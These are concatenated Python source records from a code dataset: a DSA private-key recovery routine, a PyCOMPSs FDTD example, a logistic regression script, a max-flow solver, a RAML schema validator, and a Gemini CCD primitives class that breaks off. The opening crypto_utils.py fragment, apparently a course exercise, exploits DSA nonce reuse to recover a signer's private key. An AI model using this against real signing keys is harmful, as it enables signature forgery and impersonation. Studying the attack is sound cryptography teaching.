int('04527386FE97790AAD1E70016010CF096022656AE7A36232D257DBE97267189DF8C8FC7D0237E34CAB3747D66AF095384FF6C8D2F9337B99359F27A8FD194DA6B21AE5292010D30D6711215EDC9FD95DD47506A6584AEE4CE519248BC02F4F0AFE61B5C96C340D5F2B3B39B2FEF5BD40365DA8E6767793C0486C141CDE0A01397EF5848E11408CADB96B7248916295967FA515ACC4BC48DD35913B8D3F2C0CE117EFC153557C022AC89A219BE5EDE1ECA847D63C23E35A225D4ACF18E5896E8F6181B501F738A902F4EE7529080E327D05106A498E87212CABCA4DDB69F48DA04EDBE7C9B7E69D97A12E341EC88F7A1BDEB118E31C1CB296674C4488282F1BB9', base=16), \n int('268F889EA93CD3DC56B69FB5CBDF2C486F8886B0647928B685C52DEAF30A6A0F', base=16), \n int('71059E7D7464D41121BB55F5E918CC985F3E1AB9CFDA971FA08A30BD9C069184', base=16), \n int('6F64140C9A928461FA74EE7EF9312ECFDAE5B1589DA835E04BF11200FCAA2E8A', base=16), \n 'inHushTodo/murphykimberly_m1.txt', 'inHushTodo/murphykimberly_m2.txt')\n \"\"\"\n #loading message from files\n with open(file_msg1) as f:\n msg1 = f.read()\n f.closed\n with open(file_msg2) as f:\n msg2 = f.read()\n f.closed\n \n h1 = int(sha256(msg1.encode()).hexdigest(), base=16)\n h2 = int(sha256(msg2.encode()).hexdigest(), base=16)\n #we have : r1 = (g^k1 mod p) mod q and r2 = (g^k2 mod p) mod q\n #if r1 == r2 -> (g^k1 mod p) mod q == (g^k2 mod p) mod q -> k1 == k2\n #so r1 = r2 = k and k1 = k2 = k\n \n #we also have : s1 = k^(-1)*h1 + xr -> s1*k = h1 + xr (1.1)\n #and s2 = k^(-1)*h2 + xr -> s2*k = h2 + xr (1.2)\n #GAUSSIAN ELIMINATION\n # s1*k/r = h1/r + x mod q (dividing 1.1 by r) (2.1)\n # s2*k - s1*k = h2 - h1 mod q (Subtract 2.1 times r2 from 1.2) (2.2)\n\n #NEXT step\n # k = (h2 - h1) / (s2 - s1) (dividing 2.2 by (s2 - s1))\n k = ((h2 - h1) * euclideE(s2 - s1, q)) % q\n\n # x = s1*k/r - h1/r mod q (Swap terms of 2.1)\n inv_r=euclideE(r, q)\n x = ((s1 * k) * inv_r - h1 * inv_r) % q\n \n assert(y == pow(g, x, p))\n \n# print(p, q, g) \n return x","sub_path":"crypto_utils.py","file_name":"crypto_utils.py","file_ext":"py","file_size_in_byte":29396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"235342749","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\n# For better print formatting\nfrom __future__ import print_function\n\n# Imports\nfrom pycompss.api.parallel import parallel\nfrom pycompss.api.constraint import constraint\nfrom pycompss.api.task import task\nfrom pycompss.api.api import compss_barrier\nfrom pycompss.api.api import compss_wait_on\n\nimport numpy as np\n\n\n############################################\n# MATRIX GENERATION\n############################################\n\ndef initialize_variables(n_size):\n h = create_matrix(n_size)\n e = create_matrix(n_size)\n\n return h, e\n\n\ndef create_matrix(n_size):\n mat = []\n for i in range(n_size):\n mb = create_entry(i, n_size)\n mat.append(mb)\n return mat\n\n\n@constraint(ComputingUnits=\"${ComputingUnits}\")\n@task(returns=1)\ndef create_entry(index, n_size):\n return np.float64(np.float64(index) / np.float64(n_size))\n\n\n############################################\n# MAIN FUNCTION\n############################################\n\n@parallel(tile=True)\ndef fdtd_1d(e, h, n_size, t_size, coef1, coef2):\n # Debug\n if __debug__:\n e = compss_wait_on(e)\n h = compss_wait_on(h)\n print(\"Matrix E:\")\n print(e)\n print(\"Matrix H:\")\n print(h)\n\n # Compute expected result\n if __debug__:\n import copy\n e_seq = copy.deepcopy(e)\n h_seq = copy.deepcopy(h)\n h_expected = seq_fdtd_1d(e_seq, h_seq, n_size, t_size, coef1, coef2)\n\n # FDTD\n for _ in range(t_size):\n for i in range(1, 
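DSAregenK above solves the two-signatures-one-nonce system for the private key; the same algebra on a hand-sized DSA group built for the purpose. All numbers here are toy assumptions, and pow(a, -1, m) needs Python 3.8+:

```python
# Toy-sized rerun of the nonce-reuse recovery in DSAregenK above.
# q = 101 divides p - 1 = 606 and g = 2**((p-1)//q) mod p has order q.
q, p = 101, 607
g = pow(2, (p - 1) // q, p)      # 64
x = 57                            # private key to be recovered
y = pow(g, x, p)                  # public key
k = 23                            # the nonce reused across both signatures

def dsa_sign(h):
    r = pow(g, k, p) % q
    s = (pow(k, -1, q) * (h + x * r)) % q
    return r, s

h1, h2 = 10, 20                   # stand-ins for SHA-256 digests reduced mod q
r, s1 = dsa_sign(h1)
_, s2 = dsa_sign(h2)              # same r, because k is the same

k_rec = ((h1 - h2) * pow(s1 - s2, -1, q)) % q    # k = (h1-h2)/(s1-s2) mod q
x_rec = ((s1 * k_rec - h1) * pow(r, -1, q)) % q  # solve s1*k = h1 + x*r for x
assert (k_rec, x_rec) == (k, x) and pow(g, x_rec, p) == y
```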
n_size):\n # e[i] -= coef1 * (h[i] - h[i - 1])\n e[i] = compute_e(e[i], coef1, h[i], h[i - 1])\n for i in range(n_size - 1):\n # h[i] -= coef2 * (e[i + 1] - e[i])\n h[i] = compute_h(h[i], coef2, e[i + 1], e[i])\n\n # Debug result\n if __debug__:\n h = compss_wait_on(h)\n\n print(\"New Matrix H:\")\n print(h)\n\n # Check result\n if __debug__:\n check_result(h, h_expected)\n\n\n############################################\n# MATHEMATICAL FUNCTIONS\n############################################\n\ndef compute_e(e, coef1, h2, h1):\n # import time\n # start = time.time()\n\n return e - coef1 * (h2 - h1)\n\n # end = time.time()\n # tm = end - start\n # print \"TIME: \" + str(tm*1000) + \" ms\"\n\n\ndef compute_h(h, coef2, e2, e1):\n # import time\n # start = time.time()\n\n return h - coef2 * (e2 - e1)\n\n # end = time.time()\n # tm = end - start\n # print \"TIME: \" + str(tm*1000) + \" ms\"\n\n\n############################################\n# RESULT CHECK FUNCTIONS\n############################################\n\ndef seq_fdtd_1d(e, h, n_size, t_size, coef1, coef2):\n for _ in range(t_size):\n for i in range(1, n_size):\n e[i] -= coef1 * (h[i] - h[i - 1])\n for i in range(n_size - 1):\n h[i] -= coef2 * (e[i + 1] - e[i])\n\n return h\n\n\ndef check_result(result, result_expected):\n is_ok = np.allclose(result, result_expected)\n print(\"Result check status: \" + str(is_ok))\n\n if not is_ok:\n raise Exception(\"Result does not match expected result\")\n\n\n############################################\n# MAIN\n############################################\n\nif __name__ == \"__main__\":\n # Import libraries\n import time\n\n # Parse arguments\n import sys\n\n args = sys.argv[1:]\n NSIZE = int(args[0])\n TSIZE = int(args[1])\n COEF1 = np.float64(0.5)\n COEF2 = np.float64(0.7)\n\n # Log arguments if required\n if __debug__:\n print(\"Running fdtd-1d application with:\")\n print(\" - NSIZE = \" + str(NSIZE))\n print(\" - TSIZE = \" + str(TSIZE))\n print(\" - COEF1 = \" + str(COEF1))\n print(\" - COEF2 = \" + str(COEF2))\n\n # Initialize matrices\n if __debug__:\n print(\"Initializing matrices\")\n start_time = time.time()\n H, E = initialize_variables(NSIZE)\n compss_barrier()\n\n # Begin computation\n if __debug__:\n print(\"Performing computation\")\n fdtd_start_time = time.time()\n fdtd_1d(E, H, NSIZE, TSIZE, COEF1, COEF2)\n compss_barrier(True)\n end_time = time.time()\n\n # Log results and time\n if __debug__:\n print(\"Post-process results\")\n total_time = end_time - start_time\n init_time = fdtd_start_time - start_time\n fdtd_time = end_time - fdtd_start_time\n\n print(\"RESULTS -----------------\")\n print(\"VERSION AUTOPARALLEL\")\n print(\"NSIZE \" + str(NSIZE))\n print(\"TSIZE \" + str(TSIZE))\n print(\"DEBUG \" + str(__debug__))\n print(\"TOTAL_TIME \" + str(total_time))\n print(\"INIT_TIME \" + str(init_time))\n print(\"FDTD_TIME \" + str(fdtd_time))\n print(\"-------------------------\")\n","sub_path":"examples/fdtd-1d/autoparallel/fdtd-1d.py","file_name":"fdtd-1d.py","file_ext":"py","file_size_in_byte":4643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"217114366","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 23 13:19:22 2017\n\n@authors: Group-8\n\nScript Name: SCP_01_Logistic_Regression_Model.py\n\nScript Description : This script loads the pre-processed files, split the data into 80-20% training-test set\n and applies Logistic Regression model. 
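fdtd_1d above updates e and h cell-by-cell so each step can become a task; in plain NumPy the identical sweep collapses to two slice operations per timestep, a useful reference implementation to check against:

```python
# Vectorized NumPy reference for the cell-by-cell FDTD sweep above;
# cross-checked against the element-wise loops of seq_fdtd_1d.
import numpy as np

def fdtd_1d_numpy(e, h, t_size, coef1, coef2):
    for _ in range(t_size):
        e[1:] -= coef1 * (h[1:] - h[:-1])
        h[:-1] -= coef2 * (e[1:] - e[:-1])
    return h

n, t = 8, 3
e0 = np.arange(n, dtype=np.float64) / n   # same init as create_entry above
h_vec = fdtd_1d_numpy(e0.copy(), e0.copy(), t, 0.5, 0.7)

e2, h2 = e0.copy(), e0.copy()
for _ in range(t):
    for i in range(1, n):
        e2[i] -= 0.5 * (h2[i] - h2[i - 1])
    for i in range(n - 1):
        h2[i] -= 0.7 * (e2[i + 1] - e2[i])
assert np.allclose(h_vec, h2)
```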
It also displays the Accuracy, Precision, Recall and F1 Score.\n \n\"\"\"\n\n#Import Libraries\nfrom sklearn.cross_validation import train_test_split\nimport numpy as np\nimport os\nfrom sklearn.metrics import confusion_matrix\nimport pandas as pd\nimport time\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2\n\n#FilePath\nFILEPATH = \"/Users/Avirup/Desktop/Fall, 2017/Introduction to Data Mining/Projects/Final Project/\"\n\n#Features file name\nFEATURESET_FILENAME = \"features_reviews_Clothing_Shoes_and_Jewelry.pickle\"\n\n#File containing the converted DataFrame\nDATAFRAME_FILENAME = \"reviews_Clothing_Shoes_and_Jewelry.pickle\"\n\n\n#Input Parameters\n\n#Number of important features to be retained\nNUM_FEATURES = 10\n#Number of maximum iterations\nNUM_ITER = 1000\n#Learning rate for gradient computation\nLEARNING_RATE = 5e-5\n\n\n\n#Function to compute the sigmoid function\ndef fun_sigmoid(scores):\n return 1 / (1 + np.exp(-scores))\n\n\n#Function to compute the log likelihood values\ndef fun_log_likelihood(features, labels, weights):\n scores = np.dot(features, weights)\n ll = np.sum( labels*scores - np.log(1 + np.exp(scores)) )\n return ll\n\ndef fun_logistic_regression_train(features, labels, num_steps, learning_rate):\n \n weights = np.zeros(features.shape[1])\n \n for step in xrange(num_steps):\n \n #Calculate scores based on sigmoid function\n scores = np.dot(features, weights)\n predictions = fun_sigmoid(scores)\n\n #Weight updation with gradient ascent\n out_err_val = labels - predictions\n gradient = np.dot(features.T, out_err_val)\n weights += learning_rate * gradient\n \n # Print log-likelihood values of convergence \n if step % 10 == 0:\n \n print (\"Log Likelihood value for step : \" + str(step) + \" is \" + str(fun_log_likelihood(features, labels, weights)) + \"\\n\")\n \n return weights\n\n#Check the start time\nstart_time = time.time()\n\n#Load the pre-processed pickle files\nif os.path.exists(FILEPATH + FEATURESET_FILENAME) and os.path.exists(FILEPATH + FEATURESET_FILENAME):\n print (\"Loading the file containing features...\\n\")\n features = pd.read_pickle(FILEPATH + FEATURESET_FILENAME)\n print (\"Feature Set Pickle file loaded.\\n\")\n \n print (\"Loading file containing input dataframe...\\n\")\n input_data = pd.read_pickle(FILEPATH + DATAFRAME_FILENAME)\n print (\"Input Dataframe Pickle file loaded.\\n\")\n \n #Set the max number of features\n if(NUM_FEATURES > features.shape[1]):\n print(\"Invalid Value for NUM_FEATURES. 
Selecting All Features.\")\n NUM_FEATURES = features.shape[1]\n \n #Reducing the number of features \n test = SelectKBest(score_func=chi2, k= NUM_FEATURES)\n fit = test.fit(features, input_data['Helpful'])\n best_features = fit.transform(features)\n \n print(\"Splitting the data into training and testing sets....\\n\")\n X_train, X_test, Y_train, Y_test = train_test_split(best_features.todense(),input_data['Helpful'], \n test_size=0.2, random_state=1000,stratify = input_data['Helpful'])\n print(\"Training and Test data set created successfully.\\n\")\n \n \n #Training the dataset using logistic regression\n print (\"Training the dataset using logistic regression....\\n\")\n model_weights = fun_logistic_regression_train(np.array(X_train), Y_train, \n num_steps = NUM_ITER, learning_rate = LEARNING_RATE)\n print(\"Logistic Regression Model Trained Successfully.\\n\")\n \n #Testing the dataset using the trained model weights\n print(\"Predicting Class Labels on Test Data...\\n\")\n final_scores = np.dot(np.array(X_test), model_weights)\n test_preds = np.round(fun_sigmoid(final_scores))\n print(\"Class Labels prediction completed.\\n\")\n \n #Confusion Matrix Values\n tn, fp, fn, tp = confusion_matrix(Y_test, test_preds).ravel()\n \n #Computing Precision, Recall, Accuracy and F1 Score Values\n if (tp > 0 or fp > 0 ):\n Precision = (float(tp)/(tp+fp)) * 100\n else :\n print (\"Both true and false positives are zero.\\n\")\n Precision = 0\n \n if (tp > 0 or fn > 0):\n Recall = (float(tp)/(tp+fn)) * 100 \n else:\n print (\"Both true positive and false negative are zero.\\n\")\n Recall = 0\n\n if (tp > 0 or fp > 0 or tn > 0 or fn > 0):\n Accuracy = (float(tp+tn)/(tp+fp+tn+fn))*100 \n else:\n print (\"All values in Confusion Matrix is zero.\\n\")\n Accuracy = 0 \n \n if (Precision > 0 or Recall > 0):\n F1 = (2*Precision*Recall/(Precision+Recall))\n else:\n print (\"Both Precision and Recall is zero.\\n\")\n F1 = 0\n \n #Computing Model Accuracy\n print ('Logistic Regression Model Accuracy: {0}%\\n'.format(Accuracy))\n \n #Computing Model Precision\n print ('Logistic Regression Model Precision: {0}%\\n'.format(Precision))\n \n #Computing Model Recall\n print ('Logistic Regression Model Recall: {0}%\\n'.format(Recall))\n \n #Computing Model F1 Score\n print ('Logistic Regression Model F1 Score: {0}'.format(F1))\n \n \nelse:\n print(\"No Pre-processed Pickle Files found. 
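fun_logistic_regression_train above is batch gradient ascent on the log-likelihood; the same three lines of algebra on a tiny separable dataset (Python 3 range in place of the script's xrange):

```python
# Batch gradient ascent for logistic regression, mirroring the training
# loop above, on a tiny separable dataset (column 0 is the intercept).
import numpy as np

X = np.array([[1.0, -2.0], [1.0, -1.0], [1.0, 1.0], [1.0, 2.0]])
y = np.array([0.0, 0.0, 1.0, 1.0])

weights = np.zeros(X.shape[1])
for _ in range(5000):
    predictions = 1.0 / (1.0 + np.exp(-X.dot(weights)))   # sigmoid scores
    weights += 0.05 * X.T.dot(y - predictions)            # gradient ascent step

preds = np.round(1.0 / (1.0 + np.exp(-X.dot(weights))))
assert np.array_equal(preds, y)    # separable data: training error reaches 0
```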
Please execute the pre-processing script.\\n\")\n \n#Elapsed Time\nprint(\"\\nElapsed Time --- %s Minutes ---\" % round((time.time() - start_time)/float(60),2)) \n\n","sub_path":"SCP_01_Logistic_Regression_Model.py","file_name":"SCP_01_Logistic_Regression_Model.py","file_ext":"py","file_size_in_byte":5766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"607294805","text":"def fluxoMaximo(link):\n '''\n Input: Grafo dirigido e ponderado (capacidades)\n Output: Um print do Fluxo Máximo para este Grafo.\n '''\n a = open(link, \"r\")\n lines = a.readlines()\n for line in lines:\n if \"p \" in line:\n quantidadeVertices = line.split()[2]\n matrizCapacidades = [[0 for x in range(int(quantidadeVertices))] for y in range(int(quantidadeVertices))]\n if (\"a \" in line) and \" a \" not in line:\n u = line.split()[1]\n v = line.split()[2]\n c = line.split()[3]\n matrizCapacidades[int(u) - 1][int(v) - 1] = int(c)\n s = 0\n t = int(quantidadeVertices) - 1\n n = len(matrizCapacidades)\n F = [[0] * n for _ in range(n)]\n # Capacidade residual de u para v é matrizCapacidades[u][v] - F[u][v]\n while True:\n caminho = BFS(matrizCapacidades, F, s, t)\n if not caminho:\n break\n u,v = caminho[0], caminho[1]\n fluxo = matrizCapacidades[u][v] - F[u][v]\n for i in range(len(caminho) - 2):\n u,v = caminho[i + 1], caminho[i + 2]\n fluxo = min(fluxo, matrizCapacidades[u][v] - F[u][v])\n for i in range(len(caminho) - 1):\n u,v = caminho[i], caminho[i + 1]\n F[u][v] += fluxo\n F[v][u] -= fluxo\n print('Fluxo Máximo = '+str(sum([F[s][i] for i in range(n)])))\n\ndef BFS(C, F, s, t):\n P = [-1] * len(C)\n P[s] = s\n fila = [s]\n while fila:\n u = fila.pop(0)\n for v in range(len(C)):\n if C[u][v] - F[u][v] > 0 and P[v] == -1:\n P[v] = u\n fila.append(v)\n if v == t:\n caminho = []\n while True:\n caminho.insert(0, v)\n if v == s:\n break\n v = P[v]\n return caminho\n return None","sub_path":"A3/fluxoMaximo.py","file_name":"fluxoMaximo.py","file_ext":"py","file_size_in_byte":1914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"52121821","text":"#!/usr/bin/env python\n\n# Rough and dirty validation of upstream RAML+JsonSchema\n\nfrom __future__ import print_function\nimport logging\nimport json\nimport jsonschema\nimport sys\nimport argparse\nimport collections\n\nimport python_jsonschema_objects\n\n\nknown_schemas = []\n\n\nstats = collections.Counter()\n\n\nclass TestValidationError(RuntimeError):\n def __init__(self, message, context, exception=None):\n super(RuntimeError, self).__init__(message)\n self.innerexception = exception\n self.context = context\n\n stats[self.__class__.__name__] += 1\n\n def __str__(self):\n return \"%s: %s\" % (self.__class__.__name__, self.context)\n\n\nclass Empty(TestValidationError):\n \"\"\"The example or schema was blank. It should be populated.\"\"\"\n\n\nclass EmptySchema(Empty):\n \"\"\"The example or schema was blank. It should be populated.\"\"\"\n\n\nclass EmptyExample(Empty):\n \"\"\"The example or schema was blank. 
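fluxoMaximo above is Edmonds-Karp (shortest augmenting paths by BFS over a residual capacity matrix) fed from a DIMACS file; the same algorithm on an in-memory matrix small enough to verify by hand (the cut into the sink is 2 + 3 = 5):

```python
# Edmonds-Karp on an in-memory capacity matrix, as in fluxoMaximo above
# but without the DIMACS parsing. Max flow of this graph is 5.
def edmonds_karp(C, s, t):
    n = len(C)
    F = [[0] * n for _ in range(n)]
    while True:
        # BFS for a shortest augmenting path in the residual graph
        parent = [-1] * n
        parent[s] = s
        queue = [s]
        while queue and parent[t] == -1:
            u = queue.pop(0)
            for v in range(n):
                if C[u][v] - F[u][v] > 0 and parent[v] == -1:
                    parent[v] = u
                    queue.append(v)
        if parent[t] == -1:
            break                        # no augmenting path left
        path = [t]                       # rebuild the path from the parents
        while path[-1] != s:
            path.append(parent[path[-1]])
        path.reverse()
        bottleneck = min(C[u][v] - F[u][v] for u, v in zip(path, path[1:]))
        for u, v in zip(path, path[1:]): # push flow along the path
            F[u][v] += bottleneck
            F[v][u] -= bottleneck
    return sum(F[s][v] for v in range(n))

C = [[0, 3, 2, 0],
     [0, 0, 1, 2],
     [0, 0, 0, 3],
     [0, 0, 0, 0]]
assert edmonds_karp(C, 0, 3) == 5
```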
It should be populated.\"\"\"\n\n\nclass SchemaValidationError(TestValidationError):\n \"\"\"The schema was invalid.\"\"\"\n\n\nclass ExampleVsSchemaValidationError(TestValidationError):\n \"\"\"The example was invalid according to the schema.\"\"\"\n\n\nclass Schema03(SchemaValidationError):\n \"\"\"JSONSchema03 shouldn't be used.\"\"\"\n\n\nclass UnknownSchemaType(TestValidationError):\n \"\"\"Schema isn't JSONSchema03 or JSONSchema04\"\"\"\n\n\ndef test_example_against_schema(examplestring, schema, verb=None, path=None, ctx=None):\n \"\"\"\n Example is a raw blob of JSON.\n Schema has already been parsed to an OrderedDict.\n \"\"\"\n context = \"{} {} {}\".format(verb, path, ctx)\n\n try:\n if examplestring is None:\n raise EmptyExample('Missing example.', context=context)\n\n if schema is None:\n raise EmptyExample('Missing schema.', context=context)\n\n try:\n example = json.loads(examplestring)\n except Exception as e:\n raise SchemaValidationError(\"Schema isn't valid JSON.\", context=context, exception=e)\n if example == {}:\n raise EmptyExample(\"Example = {}\", context=context)\n\n if args.no3 and schema['$schema'] == 'http://json-schema.org/draft-03/schema':\n raise Schema03('', context=context)\n\n if type(schema)==str:\n schema_string_reason = None\n try:\n json.loads(schema)\n except Exception as e:\n schema_string_reason = e\n raise SchemaValidationError(\"Schema is a string??\", context=context, exception=schema_string_reason)\n\n if schema['$schema'] in [\n 'http://json-schema.org/draft-03/schema',\n 'http://json-schema.org/draft-04/schema',\n 'http://json-schema.org/draft-03/schema#',\n 'http://json-schema.org/draft-04/schema#']:\n try:\n jsonschema.validate(example, schema)\n if not args.quiet:\n logging.debug('Valid: {}'.format(context))\n stats['Valid'] += 1\n if 'id' not in schema:\n schema['id'] = (\"{}-{}-{}\".format(path, verb, ctx)).replace(\"/\",\"_\")\n\n if schema['id'] in [x['id'] for x in known_schemas]:\n logging.warning(\"%s already in known_schemas!\")\n known_schemas.append(schema)\n\n\n\n return True\n\n except jsonschema.exceptions.SchemaError as e:\n raise SchemaValidationError(\"Schema is valid JSON, but not valid JSON Schema\", context=context, exception=e)\n\n except jsonschema.exceptions.ValidationError as e:\n raise ExampleVsSchemaValidationError(\"The example is not valid per this schema\", context=context, exception=e)\n\n else:\n raise UnknownSchemaType(\"Can't test schema {}\".format(schema['$schema']), context=context)\n\n except Empty as e:\n if not args.ignoremissing:\n raise e\n except SchemaValidationError as e:\n if not args.ignoreinvalidschema:\n raise e\n\n\ndef check_body(body, verb=None, path=None, ctx=None):\n \"\"\"\n A RamlBody is a set of Formats comprised of a Schema and Example, either in the Request or Response sections\n :param body:\n :return:\n \"\"\"\n if body is None:\n # A body isn't strictly required. 
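test_example_against_schema above leans on jsonschema.validate, which raises SchemaError for a broken schema and ValidationError for a non-conforming example; a minimal demonstration of that split, with a toy schema rather than one from the RAML:

```python
# Minimal demo of the jsonschema calls used above: a draft-04 schema,
# one conforming example and one that fails validation.
import jsonschema

schema = {
    "$schema": "http://json-schema.org/draft-04/schema#",
    "type": "object",
    "properties": {"port": {"type": "integer"}},
    "required": ["port"],
}

jsonschema.validate({"port": 80}, schema)        # passes silently

try:
    jsonschema.validate({"port": "eighty"}, schema)
except jsonschema.exceptions.ValidationError as e:
    print("example rejected:", e.message)

try:
    jsonschema.validate({}, {"type": 42})        # 42 is not a valid type
except jsonschema.exceptions.SchemaError as e:
    print("schema rejected:", e.message)
```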
For example, the server may respond with a HTTP 200 with no JSON\n # logging.warning(\"MissingBody: {} {} {}\".format(verb, path, ctx))\n # stats['MissingBody'] += 1\n return\n\n for mime in body:\n critical = None\n try:\n test_example_against_schema(body[mime].example, body[mime].schema, verb, path, ctx)\n except Empty as e:\n logging.warning(str(e))\n critical = e.innerexception # unpack inner exception, such as a jsonschema.exceptions.SchemaError\n except TestValidationError as e:\n logging.error(str(e))\n critical = e.innerexception # unpack inner exception, such as a jsonschema.exceptions.SchemaError\n if critical and args.fastfail:\n raise critical\n\n\ndef skipis(resource, islist, name=\"\"):\n if resource.is_:\n for isness in resource.is_:\n if isness in islist:\n # logging.debug(\"Ignoring %s for isness %s\" % (name, isness))\n return True\n return False\n\n\ndef check_resources(resources, name=\"\"):\n for resource in resources:\n isness = []\n\n if args.skipis and skipis(resources[resource], args.skipis, name=(name + resource)):\n stats['skipis'] += 1\n continue\n\n isness = resources[resource].is_ or []\n if 'internal' not in isness and 'supported' not in isness and 'techPreview' not in isness:\n isness.append(\"supported\")\n if 'authenticated' in isness:\n isness.remove('authenticated') # unimportant for logging\n\n supportedResource = \"[%s]\" % \",\".join(isness)\n if resources[resource].methods:\n for method in resources[resource].methods:\n m = resources[resource].methods[method]\n if method != 'get':\n check_body(m.body, method, name + resource)\n\n for response in m.responses:\n if str(response) in args.skipresponse:\n stats['skipresponse'] += 1\n continue\n check_body(m.responses[response].body, method, name + resource, \"response-\" + str(response))\n\n if resources[resource].resources:\n check_resources(resources[resource].resources, name + resource)\n\n\ndef check_raml_file(ramlfile_path):\n import pyraml.parser\n\n root = pyraml.parser.load(ramlfile_path)\n\n check_resources(root.resources)\n\n return root\n\n\ndef parse_url_response(raml, verb, route, response, status=200, contenttype='application/json'):\n routechunks = route.split('/')[1:]\n\n resource = raml\n for _ in routechunks:\n resource = resource.resources['/' + _]\n\n body = resource.methods[verb].responses[status].body[contenttype]\n return test_example_against_schema(response, body.schema, verb=verb, path=route, ctx=\"example\")\n\n\nif __name__ == \"__main__\":\n global args\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler(sys.stderr)\n formatter = logging.Formatter(u'%(asctime)s %(name)s[%(process)d] %(levelname)s %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n try:\n import coloredlogs\n coloredlogs.install(level='DEBUG', fmt=u'%(asctime)s %(name)s[%(process)d] %(levelname)s %(message)s')\n except ImportError:\n pass # if we don't get colors, that's not a big deal\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"filename\",\n help=\"Existing RAML file to be read. 
Required.\")\n parser.add_argument(\"--fastfail\", action=\"store_true\", default=False,\n help=\"Instead of processing all items, halt with the first exception.\")\n parser.add_argument(\"--quiet\", action=\"store_true\", default=False,\n help=\"Don't report success.\")\n parser.add_argument(\"--ignoreinvalidschema\", action=\"store_true\", default=False,\n help=\"If the schema is invalid, ignore it.\")\n parser.add_argument(\"--ignoremissing\", action=\"store_true\", default=False,\n help=\"If the schema/example is Blank or {}, ignore it.\")\n parser.add_argument(\"--no3\", action=\"store_true\", default=False,\n help=\"Treat JSONSchema Draft 3 as an error.\")\n parser.add_argument(\"--skipis\", action=\"append\", default=[],\n help=\"ignore any resource which 'is' in this list; e.g., techPreview\")\n parser.add_argument(\"--skipresponse\", action=\"append\", default=[],\n help=\"ignore any resource response in this list; e.g., 404\")\n # supported\n\n args = parser.parse_args()\n if args.filename is None:\n parser.error(\"filename required\")\n\n parsedramlroot = check_raml_file(args.filename)\n logger.info(stats)\n\n example = \"\"\"{\n \"masterAddress\": \"10.0.0.123\",\n \"masterUiPort\": 80,\n \"workerAddress\": \"10.0.0.124\",\n \"workerPort\": 16520,\n \"workerToken\": \"0ae94cb9-550a-4c01-85b9-3b7095e92321\"\n }\"\"\"\n\n # commented out as it modifies global state\n # assert(parse_url_response(raml=parsedramlroot, verb='post', route='/deployment/join', status=200, response=example))\n\n\n # try to construct individually\n for splice_schema in known_schemas:\n logging.warning(\"Trying to create %s\" % splice_schema['id'])\n o = python_jsonschema_objects.ObjectBuilder(splice_schema)\n c = o.classes\n logging.warning(\"Done create %s\" % splice_schema['id'])\n\n logging.warning(\"All done!\")\n\n # try to construct mega-schema\n\n schema={\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"id\": \"http://vmware.com/go/loginsight/api/raml\",\n #\"title\": \"Something\",\n #\"type\": \"object\",\n #\"oneOf\": [],\n \"definitions\": {},\n \"name\": \"ASDF\",\n \"properties\": {\n \"schemaversion\": {\n \"type\": \"string\",\n \"default\": \"a7f49308cccfa22a440bc2d519883853bbf2174c\",\n #\"enum\": [\"a7f49308cccfa22a440bc2d519883853bbf2174c\"]\n }\n }\n }\n\n from pprint import pprint\n\n cnt=0\n for splice_schema in known_schemas:\n print(\"Splicing in %s\" % splice_schema['id'])\n if splice_schema['id'] in schema['definitions']:\n logger.warning(\"%s already in schema[definitions]!\" % splice_schema['id'], splice_schema)\n continue\n schema['definitions'][splice_schema['id']] = splice_schema\n #schema['oneOf'].append({\n # \"$ref\": \"#/definitions/%s\" % splice_schema['id']\n #})\n\n\n if 'definitions' in splice_schema:\n # child definitions\n for d in splice_schema['definitions']:\n if d in schema['definitions']:\n logger.warning(\"%s already in schema[definitions]!\" % splice_schema['id'], splice_schema)\n schema['definitions'][d] = splice_schema['definitions'][d]\n\n\n logger.warning(\"Trying to build with %d definitions! 
%s\" % (len(schema['definitions']), str(schema['definitions'].keys())))\n o = python_jsonschema_objects.ObjectBuilder(schema)\n c = o.classes\n\n\n #with open(\"render.json\", 'w') as f:\n # pprint(schema, stream=f)\n\n\n\n\n\n\n","sub_path":"utils/RenderModels.py","file_name":"RenderModels.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433259505","text":"#\n# gemini_python\n#\n# primitives_ccd.py\n# ------------------------------------------------------------------------------\nfrom datetime import datetime\n\nimport numpy as np\n\nfrom astropy.modeling import models, fitting\nfrom scipy.interpolate import UnivariateSpline, LSQUnivariateSpline\n\nfrom astrodata.provenance import add_provenance\nfrom astrodata import wcs as adwcs\nfrom gempy.gemini import gemini_tools as gt\n\nfrom geminidr import PrimitivesBASE\nfrom recipe_system.utils.md5 import md5sum\nfrom . import parameters_ccd\n\nfrom recipe_system.utils.decorators import parameter_override\n# ------------------------------------------------------------------------------\n@parameter_override\nclass CCD(PrimitivesBASE):\n \"\"\"\n This is the class containing all of the primitives used for generic CCD\n reduction.\n \"\"\"\n tagset = None\n\n def __init__(self, adinputs, **kwargs):\n super().__init__(adinputs, **kwargs)\n self._param_update(parameters_ccd)\n\n def biasCorrect(self, adinputs=None, suffix=None, bias=None, do_bias=True):\n \"\"\"\n The biasCorrect primitive will subtract the science extension of the\n input bias frames from the science extension of the input science\n frames. The variance and data quality extension will be updated, if\n they exist. If no bias is provided, getProcessedBias will be called\n to ensure a bias exists for every adinput.\n\n Parameters\n ----------\n suffix: str\n suffix to be added to output files\n bias: str/list of str\n bias(es) to subtract\n do_bias: bool\n perform bias subtraction?\n \"\"\"\n log = self.log\n log.debug(gt.log_message(\"primitive\", self.myself(), \"starting\"))\n timestamp_key = self.timestamp_keys[self.myself()]\n\n if not do_bias:\n log.warning(\"Bias correction has been turned off.\")\n return adinputs\n\n if bias is None:\n self.getProcessedBias(adinputs, refresh=False)\n bias_list = 